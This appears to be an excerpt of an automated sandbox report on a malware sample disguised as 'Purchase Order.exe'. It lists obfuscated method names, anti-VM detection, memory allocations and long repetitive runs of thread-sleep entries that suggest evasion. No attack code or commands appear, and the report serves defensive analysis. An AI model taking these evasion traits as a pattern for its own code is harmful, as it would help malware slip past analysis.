Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, h7wEcfFpN0g0i0ux4x.cs	High entropy of concatenated method names: 'PmR7BrLIGq', 'ULm7kq2vHF', 'IKS7YvQlhd', 'RYn7N7fZPr', 'Hi07EMXJDq', 'Xm47QBWVG0', 'wWk7gDWBd4', 'K007htAsYs', 'kx27IfSHod', 'n8r70ufXBI'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, Odifjlz3uKTsuoAcLW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IYepbVT2OF', 'U5Wpq0WwZ6', 'q46pUd7w9x', 'UGupcRKiU6', 'e5Mp7M15jq', 'nUJppygWE3', 'LbKp4MIkKF'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, qqNBolPHdfOcJ17he34.cs	High entropy of concatenated method names: 'sIQpuMuT5E', 'Bvvp9pFWLW', 'TPZpLwlAH8', 'OuUpVh9pt0', 'aNQpX2LQ1B', 'Ob1pjLQQlo', 'gVmp57eyo6', 'R4HpDons98', 'TwgpsiMlns', 'IPtpf18tpt'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, xYImOGNYJlADaHk6Ra.cs	High entropy of concatenated method names: 'eIccISdWsX', 'b9uc0xLwVQ', 'ToString', 'lK1cB2IqOG', 'lOucktC2GL', 'clScYxX6CQ', 'gXRcNsPlV2', 'a5JcEtSU9A', 'eTYcQFlWbJ', 'FZtcgLM8mU'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, vCdweLJf9FCMY7p7sY.cs	High entropy of concatenated method names: 'Dispose', 'AnfdSjnDKu', 'uRJw3HACTG', 'XTFJJMkR8j', 'Vdqd1I1cGa', 'D85dza6r4C', 'ProcessDialogKey', 'f58wito6LS', 'JtjwdRHR3v', 'ox2wwgVHwc'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, rbTIQFDs74rvLVtopd.cs	High entropy of concatenated method names: 'a5odQtGSFy', 'eiMdgPGEGL', 'MgKdIuX06d', 'OrRd0O7jve', 'DVfdquTE3t', 'MGHdUbWSFA', 'RdImPFJAgdNX5kGTEI', 'LDUZckS9vEbbIgYIT5', 'YgCddFfjBj', 'abdd292gXx'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, ISxtSLitdJyIZK0W8M.cs	High entropy of concatenated method names: 'pBNEKxaf7I', 'rSOEuXIQOG', 'AByELtwMN3', 'AUUEVa0vRG', 'mCTEj0tBKq', 'YiTE5ARojQ', 'VpvEsHxt8o', 'U0gEfTO29w', 'Dp9MbXWHGKBpJfH7Twg', 'mLEKevWK06frVFW6SS7'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, ytZKh3R2l1iHWImtrk.cs	High entropy of concatenated method names: 'WJKQBjdtgH', 'iZVQYAMSYx', 'u70QEK6Dhh', 'KtAE1ppFB6', 'F2mEzolS0M', 'nOKQihFeHC', 'MjwQdTU56W', 'wwSQwnle7d', 'eqwQ2BW0XX', 'AmuQ6CpeMZ'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, yF43FxXp2wRWkfKGm1.cs	High entropy of concatenated method names: 'WwSEGf0NrI', 'S9PEksxljU', 'LnEENBhyLc', 'Nc0EQ3xY9D', 'bsfEg944VM', 'GTUNlt66JV', 'eMrNmEJkVt', 'HvjNeth2kT', 'NlvNoQTRoZ', 'zKfNSrsdKT'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, TDwGx2eHAduadx63KE.cs	High entropy of concatenated method names: 'waepdNh4Yy', 'taVp2IGrty', 'd3pp61X1T2', 'YGJpBJpeWv', 'fKipkxWeRb', 'uglpNF7YVI', 'fTepEhZeC0', 'pDo7eG86bg', 'xGw7oVycMw', 'iQ37SKtM89'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, WOEeoXxWVHD4PPxwQc.cs	High entropy of concatenated method names: 'q3UkZyWBJb', 'JOYkFhJPI6', 'WQSk83LDLd', 'wKEkOFrrQS', 'zLjkl3eFrx', 'hO4kmhYOyg', 'VDFkevvZP2', 'Qurko7PYPT', 'OtCkS85gJE', 'N2vk1Ck6Ba'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, JhwlxM4bR2lxySGrNM.cs	High entropy of concatenated method names: 'EHTcoCvown', 'AVbc1gkRNy', 'g057iqG35G', 'rDI7dui7uO', 't3bcTTWhQD', 'bm3cMWvAwP', 'H1QcnWS0Rd', 'fZwcZ5849A', 'jWkcFVXfPg', 'zuxc8xolW6'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, LeruYXEJgdh0317JJ5.cs	High entropy of concatenated method names: 'arv2GXIM7r', 'OS22BPcwvo', 'MYS2k3Hkoq', 'brx2YNB8Q0', 'k5V2N8VDxw', 'do02EV76dO', 'u0M2QjmJvK', 'sal2gZLP8N', 'QEW2hpAAFa', 'lbS2Ig88uR'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, YmUQD00WVSemVelgiw.cs	High entropy of concatenated method names: 'DBHbDwOuIc', 'QrlbsNLME5', 'S4gbyP2cOp', 'xVSb3Dh5FZ', 'xTBbrQXWKs', 'AhXbWQsp9Z', 'dMqbCi3GOE', 'FDtbRFAZw3', 'ln4bHn96Ap', 'P5nbTfqXuW'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, hdDtTJAZUL6LTvg8kM.cs	High entropy of concatenated method names: 'hSMQE2WrCtTK3gRGlu2', 'h1eK38W9EHviPL4a5ZG', 'xIT7BKW4o0UJiYZH5et', 'DV3E7xgF0b', 'g9jEpwQLa9', 'LLeE4bBKgt', 'hMrbtpWYhfSMkV2guts', 'u7m4rGWVvCT8qfaTAoJ'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, CCatRHtdeEdpD35Ed5.cs	High entropy of concatenated method names: 'lYnYVo6NnV', 'HN8Yj2Dqhw', 'vepYDsL33o', 'DYhYs0tOu1', 'FjmYqZMSHo', 's6ZYUcquSO', 'MDOYclIbmH', 'EQYY7ElXZy', 'HsqYp29TBH', 'gTuY4dNQ48'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, CKYUDtruqr7JNgjTSk.cs	High entropy of concatenated method names: 'j6J7yMjGxD', 'su973QbRxD', 'nAx7andOL2', 'MqY7rP8aJp', 'HBI7Z0KBa5', 'iMa7WIdFoy', 'Next', 'Next', 'Next', 'NextBytes'

Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR

Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 44E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 83F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 93F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: A6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596967	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596857	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596377	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595768	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595558	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593514	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593406	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593297	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 593063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592517	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592374	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 592266	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Window / User API: threadDelayed 7675			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Window / User API: threadDelayed 2138			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7788	Thread sleep count: 7675 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7788	Thread sleep count: 2138 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596967s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596857s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596377s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -595768s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -595558s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -593797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -593514s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -593406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -593297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -593188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -593063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -592938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -592813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 7784	Thread sleep time: -592688s >= -30000s	Jump to behavior
